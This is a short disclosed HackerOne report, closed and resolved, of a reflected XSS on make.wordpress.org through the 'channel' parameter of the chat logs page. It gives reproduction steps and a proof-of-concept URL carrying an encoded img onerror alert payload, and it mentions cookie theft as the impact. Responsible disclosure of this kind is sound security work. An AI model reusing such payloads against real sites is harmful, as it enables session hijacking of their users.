Reflected XSS on https://make.wordpress.org via 'channel' parameter

Disclosed: 2019-08-26 00:45:03 By gnux To wordpress

High

Vulnerability Details

Hi there, I just found a reflected XSS on make.wordpress.org domain. steps to reproduce : 1. visit this link : https://make.wordpress.org/chat/logs?channel=16%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E&date=2019-07-21&no_bots=1 2. xss pop up will occurs POC: see:wp reflected xss.png Note: it works on the latest version of firefox ## Impact some of xss impact like stealing cookies, session hijacking, etc ..

Actions

View on HackerOne

Report Stats

Report ID: 659419
State: Closed
Substate: resolved
Upvotes: 96

Reflected XSS on https://make.wordpress.org via 'channel' parameter

Vulnerability Details

Actions

Report Stats

Share this report